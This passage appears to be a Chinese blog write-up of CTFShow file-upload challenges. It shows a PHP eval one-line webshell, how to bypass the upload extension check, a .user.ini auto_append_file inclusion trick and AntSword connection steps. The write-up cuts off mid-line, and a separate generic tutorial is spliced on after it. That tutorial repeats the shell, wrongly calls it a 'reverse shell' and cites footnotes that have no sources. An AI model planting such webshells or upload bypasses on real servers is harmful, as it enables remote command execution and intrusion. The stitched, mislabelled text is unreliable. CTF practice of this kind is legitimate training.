ctfshow web入门 文件上传前篇(web151-web160)

本文详细介绍了CTFShow中一系列Web安全挑战,包括利用.user.ini绕过、短标签、过滤字符绕过等技巧,涉及文件上传、命令执行及日志包含等漏洞利用方法,通过实例解析了如何一步步获取flag。

目录

web151-web152

web153

web154

web155

web156

web157-web159

web160

web161


web151-web152

首先写一个一句哈:

<?php @eval($_POST["1"]);?>

然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag

 

 

 拿到flag~~~~

web153

使用.user.ini绕过

.user.ini

摘抄其他大佬的解释:

指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件

上传.user.ini内容为auto_append_file="xxx"

xxx为我们上传的文件名,这样在php文件上传了我们的木马文件

步骤:</

### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值